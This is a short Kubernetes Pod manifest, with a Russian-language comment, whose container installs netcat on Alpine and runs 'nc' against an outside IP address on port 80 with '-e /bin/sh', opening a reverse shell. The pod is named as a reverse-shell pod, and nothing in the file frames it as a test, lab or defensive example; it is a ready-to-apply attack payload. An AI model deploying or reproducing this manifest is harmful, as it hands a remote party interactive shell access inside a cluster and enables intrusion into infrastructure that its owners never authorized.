apiVersion: v1
kind: Pod
metadata:
  name: reverse-shell-pod-v2 # Дадим новое имя, чтобы избежать проблем с обновлением
spec:
  containers:
  - name: shell-container
    image: alpine
    command: ["/bin/sh", "-c"]
    args:
    - |
      apk add --no-cache netcat-openbsd && nc 31.131.21.53 80 -e /bin/sh
